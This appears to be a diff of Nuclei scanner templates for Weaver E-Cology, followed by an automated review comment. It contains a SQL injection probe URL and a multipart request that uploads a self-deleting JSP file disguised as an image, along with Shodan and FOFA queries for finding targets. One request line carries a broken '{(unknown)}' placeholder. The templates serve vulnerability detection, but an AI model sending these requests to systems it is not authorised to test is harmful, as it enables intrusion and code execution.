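+- "{{BaseURL}}/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),4,5,6,7"
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- '{{md5(num)}}'
+- type: status
+status:
+- 200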


@ -0,0 +1,57 @@
id: weaver-ktreeuploadaction-file-upload
info:
name: Weaver E-Cology KtreeUploadAction - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
There is a file upload vulnerability in Weaver E-Cology. An attacker can upload any file through KtreeUploadAction.jsp and further exploit it.
reference:
- https://buaq.net/go-117479.html
metadata:
max-request: 2
verified: true
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
tags: weaver,ecology,fileupload,intrusive
variables:
num1: "{{rand_int(40000, 50000)}}"
num2: "{{rand_int(40000, 50000)}}"
result: "{{to_number(num1)*to_number(num2)}}"
http:
- raw:
- |
@timeout: 20s
POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib
------WebKitFormBoundarywgljfvib
Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
Content-Type: image/jpeg
<%out.print({{num1}} * {{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundarywgljfvib--
- |
@timeout: 20s
GET {(unknown)} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
- "contains(body_2, '{{result}}') && status_code_2 == 200"
condition: and
extractors:
- type: regex
name: filename
group: 1
regex:
- "','url':'(.*?)','title"
internal: true
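Review bot: The second raw request's target, `GET {(unknown)} HTTP/1.1`, is not a `{{variable}}` reference, so the `filename` extractor declared `internal: true` below is never consumed and the request line would carry that literal text; presumably `GET {{filename}} HTTP/1.1` is intended, unless the page renderer mangled the placeholder, which should be checked against the file itself. The same literal appears in the removed `weaver-e-cology-ktreeuploadaction-arbitrary-file-upload` template, so it may have been carried over rather than introduced here. `num1` and `num2` explain themselves through their expressions, but `result` deserves a line such as `# product printed by the uploaded JSP; looked for in body_2`. The extractor block appears to close the template; if the file continues past this point, the remainder was not visible here.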